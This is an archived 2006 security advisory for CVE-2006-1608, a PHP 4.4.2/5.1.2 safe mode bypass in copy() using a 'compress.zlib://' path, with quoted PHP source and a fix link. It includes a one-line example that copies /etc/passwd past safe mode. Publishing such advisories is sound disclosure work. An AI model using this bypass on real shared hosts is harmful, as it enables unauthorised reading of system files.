exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

copy-php-safe.txt

copy-php-safe.txt
Posted Apr 14, 2006
Authored by Maksymilian Arciemowicz

PHP 4.4.2 and 5.1 allows for a safe mode bypass via the copy() function.

tags | advisory, php
SHA-256 | e61c4b8601115e3b07ad0f6eb72b0832ffcff46804cbfef6a2c12db9fdcc6a03

copy-php-safe.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 2.4.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1608

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.

The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren't very realistic, many people, especially ISP's, use safe mode for now.

- --- 1. Safe Mode Bypass ---
General problem exists in safe mode function, because safe mode accept path like "compress.zlib://".

PHP442 File "main/safe_mode.c"
- -78-80---
wrapper = php_stream_locate_url_wrapper(filename, NULL, STREAM_LOCATE_WRAPPERS_ONLY TSRMLS_CC);
if (wrapper != NULL)
return 1;
- -78-80---

if php_stream_locate_url_wrapper() return something.. safe mode is going to stop.
Let`s see the function php_stream_locate_url_wrapper().

PHP442 File "main/streams.c"

- -2522-2588---
PHPAPI php_stream_wrapper *php_stream_locate_url_wrapper(const char *path, char **path_for_open, int options TSRMLS_DC)
{
HashTable *wrapper_hash = (FG(stream_wrappers) ? FG(stream_wrappers) : &url_stream_wrappers_hash);
php_stream_wrapper *wrapper = NULL;
const char *p, *protocol = NULL;
int n = 0;

if (path_for_open)
*path_for_open = (char*)path;

if (options & IGNORE_URL)
return (options & STREAM_LOCATE_WRAPPERS_ONLY) ? NULL : &php_plain_files_wrapper;

for (p = path; isalnum((int)*p) || *p == '+' || *p == '-' || *p == '.'; p++) {
n++;
}

if ((*p == ':') && (n > 1) && !strncmp("://", p, 3)) {
protocol = path;
} else if (strncasecmp(path, "zlib:", 5) == 0) {
/* BC with older php scripts and zlib wrapper */
protocol = "compress.zlib";
n = 13;
if (options & REPORT_ERRORS) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Use of \"zlib:\" wrapper is deprecated; please use \"compress.zlib://\" instead.");
}
}

if (protocol) {
if (FAILURE == zend_hash_find(wrapper_hash, (char*)protocol, n, (void**)&wrapper)) {
char wrapper_name[32];

if (options & REPORT_ERRORS) {
if (n >= sizeof(wrapper_name))
n = sizeof(wrapper_name) - 1;
PHP_STRLCPY(wrapper_name, protocol, sizeof(wrapper_name), n);

php_error_docref(NULL TSRMLS_CC, E_NOTICE, "Unable to find the wrapper \"%s\" - did you forget to enable it when you configured PHP?",
wrapper_name);
}

wrapper = NULL;
protocol = NULL;
}
}
/* TODO: curl based streams probably support file:// properly */
if (!protocol || !strncasecmp(protocol, "file", n)) {
if (protocol && path[n+1] == '/' && path[n+2] == '/') {
if (options & REPORT_ERRORS)
php_error_docref(NULL TSRMLS_CC, E_WARNING, "remote host file access not supported, %s", path);
return NULL;
}
if (protocol && path_for_open)
*path_for_open = (char*)path + n + 1;

/* fall back on regular file access */
return (options & STREAM_LOCATE_WRAPPERS_ONLY) ? NULL : &php_plain_files_wrapper;
}

if (wrapper && wrapper->is_url && !PG(allow_url_fopen)) {
if (options & REPORT_ERRORS)
php_error_docref(NULL TSRMLS_CC, E_WARNING, "URL file-access is disabled in the server configuration");
return NULL;
}

return wrapper;
}
- -2522-2588---

So if you use in your path (for example "compress.zlib://"), function php_stream_locate_url_wrapper() return something variable and safe mode return 1.

Let's see now the source of function copy().

PHP442: ext/standard/file.c

- -2114-2138---
PHP_FUNCTION(copy)
{
zval **source, **target;

if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &source, &target) == FAILURE) {
WRONG_PARAM_COUNT;
}

convert_to_string_ex(source);
convert_to_string_ex(target);

if (PG(safe_mode) &&(!php_checkuid(Z_STRVAL_PP(source), NULL, CHECKUID_CHECK_FILE_AND_DIR))) {
RETURN_FALSE;
}

if (php_check_open_basedir(Z_STRVAL_PP(source) TSRMLS_CC)) {
RETURN_FALSE;
}

if (php_copy_file(Z_STRVAL_PP(source), Z_STRVAL_PP(target) TSRMLS_CC)==SUCCESS) {
RETURN_TRUE;
} else {
RETURN_FALSE;
}
}
- -2114-2138---

http://pl2.php.net/manual/en/function.copy.php

Description
bool copy ( string source, string dest )

example:
copy("compress.zlib:///etc/passwd", "/home/cxib/to/bandyta/passwd.txt");

safe mode return 1 and skip security.

if (PG(safe_mode) &&(!php_checkuid(Z_STRVAL_PP(source), NULL, CHECKUID_CHECK_FILE_AND_DIR))) {
RETURN_FALSE;
}

return true.

Rest functions have checking safe_mode without path and safe mode works. I don't have tested all functions in php ;].

- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS

- --- 3. Exploit ---
http://securityreason.com/achievement_exploitalert/8

- --- 4. Greets ---

For: sp3x
and
p_e_a, eax, Infospec

- --- 5. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFEOAu93Ke13X/fTO4RApXzAKC4OuM/3vn8kyw+EP2R8YVYyH9gkgCcDCMj
2dB55e2x6sPGBJW+w9Kw/OY=
=Lfuk
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close